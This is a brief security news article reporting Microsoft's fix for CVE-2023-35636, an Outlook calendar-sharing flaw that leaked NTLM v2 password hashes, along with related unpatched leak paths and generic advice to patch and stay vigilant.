The vulnerability in Microsoft Outlook that allowed access to NT Lan Manager (NTLM) V2 hashed passwords has been eliminated, according to a recent report. Attackers were able to exploit this vulnerability by using a specially created file to gain access to these passwords. The NTLM V2 protocol is commonly used for user authentication on remote servers, making the hashed passwords a valuable target for attackers.
This security flaw, known as CVE-2023-35636 (CVSS: 6.5), was addressed by Microsoft in an unscheduled security update in December 2023. Microsoft has provided details on how the vulnerability can be used:
- In an email attack scenario, cybercriminals could exploit the vulnerability by sending a specially crafted file to a user and convincing them to open it.
- In a web script attack, an attacker could use a website (or compromise a website that accepts user-generated content) to host a specially crafted file that exploits the vulnerability.
In both cases, the attacker would need to persuade the victim to follow a link included in a phishing email or message and open the corresponding file.
The specific vulnerability, CVE-2023-35636, affects the general access to the calendar function in Outlook. Malicious emails can be crafted to include specific headers, such as “Content-Class” and “X-Sharing-Config-Url”, that reveal the NTLM hash during authentication. When the victim opens the email, Outlook connects to the attacker’s server and transfers the NTLM V2 hash for authentication.
Security researcher Debe Thaler, from Varonis, discovered that leaking NTLM hashes can occur when using Windows Performance Analyzer (WPA) and Windows Conductor. These two attack methods have yet to be addressed by Microsoft. Thaler highlighted that WPA attempts to authenticate using NTLM V2 over an open network, which is typically reserved for internal services based on IP addresses. When the NTLM V2 hash is transmitted over the open internet, it becomes vulnerable to relay attacks and offline cracking attempts.
This incident serves as a reminder for individuals and organizations to remain vigilant, regularly update their software, and exercise caution when dealing with suspicious emails and files. It also underscores the importance of robust security protocols and continuous monitoring to detect and mitigate vulnerabilities in a timely manner.